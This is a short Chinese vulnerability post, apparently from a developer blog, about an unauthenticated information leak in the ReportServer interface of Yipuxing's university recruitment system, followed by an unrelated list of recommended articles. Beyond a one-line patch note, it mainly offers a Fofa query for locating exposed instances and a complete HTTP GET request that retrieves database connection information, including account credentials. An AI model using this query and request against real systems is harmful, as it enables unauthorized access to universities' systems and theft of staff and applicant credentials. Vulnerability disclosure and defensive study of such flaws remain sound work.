易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
doubt。3 小时前
2.[网鼎杯 2020 朱雀组]phpweb
网络·安全·web安全·网络安全·php·代码复审
Allen_LVyingbo4 小时前
构建医疗AI编程可控价值观罗盘:多维度融合导向
安全·全文检索·健康医疗
字节全栈_BjO5 小时前
武汉科技大学计算机课程设置,武汉科技大学计算机控制与接口技术课程实施方案
科技
最新快讯5 小时前
科技快讯 | 领英“隐私风波”告一段落;华为余承东智驾 1345 公里返工,称智界 R7 打赢“鸡蛋保卫战”;谷歌翻译将增“提问”功能
科技
go54631584656 小时前
python 从知网的期刊导航页面抓取与农业科技相关的数据
开发语言·python·科技
最新快讯6 小时前
科技快讯 | OpenAI首次向免费用户开放推理模型;特朗普与黄仁勋会面;雷军回应“10后小学生深情表白小米SU7”
科技
大秦王多鱼11 小时前
Kafka SASL/SCRAM介绍
分布式·安全·kafka·apache
涛ing18 小时前
32. C 语言 安全函数( _s 尾缀)
linux·c语言·c++·vscode·算法·安全·vim
学问小小谢18 小时前
第26节课:内容安全策略(CSP)—构建安全网页的防御盾
运维·服务器·前端·网络·学习·安全
佛州小李哥1 天前
通过亚马逊云科技Bedrock打造自定义AI智能体Agent(上)
人工智能·科技·ai·语言模型·云计算·aws·亚马逊云科技